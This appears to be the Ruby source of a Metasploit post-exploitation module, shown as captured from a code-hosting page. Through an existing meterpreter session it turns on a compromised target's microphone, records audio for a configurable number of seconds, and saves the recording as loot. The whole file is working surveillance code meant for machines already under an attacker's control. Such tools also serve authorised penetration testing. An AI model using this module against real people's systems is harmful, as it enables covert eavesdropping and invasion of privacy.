85 lines
1.9 KiB
Ruby
85 lines
1.9 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex'
|
|
|
|
class MetasploitModule < Msf::Post
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
def initialize(info={})
|
|
super( update_info( info,
|
|
'Name' => 'Multi Manage Record Microphone',
|
|
'Description' => %q{
|
|
This module will enable and record your target's microphone.
|
|
For non-Windows targets, please use Java meterpreter to be
|
|
able to use this feature.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'sinn3r'],
|
|
'Platform' => %w{ linux osx win },
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptInt.new('DURATION', [false, 'Number of seconds to record', 5])
|
|
], self.class)
|
|
end
|
|
|
|
def rhost
|
|
client.sock.peerhost
|
|
end
|
|
|
|
def progress
|
|
duration = datastore['DURATION']
|
|
m = duration / 10
|
|
m = 1 if m == 0
|
|
|
|
duration.times do |i|
|
|
if i % m == 0
|
|
p = ((Float((i == 0) ? 1 : i+1) / duration) * 100).round
|
|
print_status("#{rhost} - #{p.to_s}%...")
|
|
end
|
|
select(nil, nil, nil, 1)
|
|
end
|
|
end
|
|
|
|
def run
|
|
if client.nil?
|
|
print_error("Invalid session ID selected. Make sure the host isn't dead.")
|
|
return
|
|
end
|
|
|
|
data = nil
|
|
|
|
begin
|
|
t = framework.threads.spawn("prog", false) { progress }
|
|
data = client.webcam.record_mic(datastore['DURATION'])
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
print_error(e.message)
|
|
return
|
|
ensure
|
|
t.kill
|
|
end
|
|
|
|
if data
|
|
print_status("#{rhost} - Audio size: (#{data.length.to_s} bytes)")
|
|
p = store_loot(
|
|
"#{rhost}.audio",
|
|
'application/octet-stream',
|
|
rhost,
|
|
data,
|
|
"#{rhost}_audio.wav",
|
|
"#{rhost} Audio Recording"
|
|
)
|
|
|
|
print_good("#{rhost} - Audio recording saved: #{p}")
|
|
end
|
|
end
|
|
|
|
end
|